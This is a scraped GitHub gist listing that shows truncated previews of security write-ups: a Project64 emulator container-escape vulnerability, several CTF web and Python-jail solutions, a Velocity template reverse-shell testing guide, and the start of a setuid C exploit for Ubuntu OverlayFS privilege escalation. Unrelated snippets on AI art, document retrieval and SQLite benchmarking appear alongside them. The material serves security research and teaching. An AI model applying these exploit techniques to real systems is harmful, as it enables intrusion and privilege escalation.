Skip to content

Instantly share code, notes, and snippets.

View Siss3l's full-sized avatar
:shipit:

Sissel Siss3l

:shipit:
47 followers · 0 following
View GitHub Profile
@aglab2
aglab2 / a.md
Last active May 29, 2024 00:43
Project 64 1.6 container escape vulnerability writeup

Vulnerable emulator is Project 64 1.6.x/1.7. 2 vulnerabilities can be used to gain arbitrary code execution from emulation container from N64 ROM.

  1. Container escape and arbitrary writes from N64 ROM outside of designated N64 RAM

Vulnerable function Compile_R4300i_SB and its friends Compile_R4300i_S* https://github.com/zeromus/pj64/blob/master/RecompilerOps.cpp#L1955C6-L2024

If non const Opcode.base is used to avoid condition at 1961-1971 which does checks properly, we can load from volatile address addr (compiled to MIPS asm inside ROM):

@mechaneyes
mechaneyes / intro.md
Created January 26, 2024 00:34
AI Art Generation
@Siss3l
Siss3l / sealed.md
Last active April 28, 2024 22:12
Sealed Note - 1337UP Capture The Flag 2023 (thanks to @aszx87410)

Sealed Note

  • Category: Web
  • Alone: (0 solve)

Challenge

Description

We have access to a web challenge allowing us to create, read and send notes to a Puppeteer bot:

@win3zz
win3zz / VelocityReverseShell.md
Created November 12, 2023 06:43
Velocity Template Language (VTL) - Remote Command Execution - Reverse Shell - SSTI - Testing

Download Dependencies

user@hostname:~$ mkdir velocity-engine
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-core-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-scripting-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/spring-velocity-support-2.3.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.13.0/commons-lang3-3.13.0.jar
user@hostname:~/velocity-engine$ cd ..
user@hostname:~$
@win3zz
win3zz / GameOver(lay).md
Last active February 22, 2024 11:50
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629) 
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {
@rebane2001
rebane2001 / _safest-eval-writeup.md
Last active March 14, 2024 17:41

Hack.lu CTF 2023 - Safest Eval (Python jail escape)

Challenge by: realansgar
Writeup by: rebane2001

Overview

The challenge consists of a simple Flask webapp that lets you eval arbitrary Python code in a jail in order to evaluate your solution to a leetcode-style programming challenge. The flag can be retrieved by running the /readflag setuid program. The source code was provided.

Flash challenge website

@ljnmedium
ljnmedium / model_inforetrieval.py
Created September 29, 2023 07:39
model_inforetrieval.py
chatdoc = ChatDoc(model_name= OPENAI_MODEL)
chatdoc.connect_openai_api()
questions = QUESTIONS_COMMITTE_AUDIT
retriever.retreive_with_query( query, top_k=1, namespace='Eiffage')
contexts = loader_document.retreive_contents_from_ids(ids)
respone = chatdoc.prompt_with_context(query, contexts= list(contexts.values()), verbose=True)
print(query,'\n', respone, '\n')
@simonw
simonw / README.md
Created September 10, 2023 17:15
SQLite micro-benchmark with Python threading

I got GPT-4 Code Interpreter to write most of this for me, transcript here

I had to modify it a tiny bit to get it to run, the parameters for the queries were missing.

Results on my M2 MacBook Pro:

---------------
Mode | Scenario | Update QPS | Select QPS
---------------
@Siss3l
Siss3l / 0723.md
Last active July 26, 2023 00:02
Intigriti's July 2023 Web challenge thanks to @kavishkagihan

Intigriti July Challenge

  • Category: Web
  • Impact: Medium
  • Solves: 35

Challenge

Description

@arkark
arkark / README.md
Last active July 26, 2023 07:44
Google CTF 2023 - web/Biohazard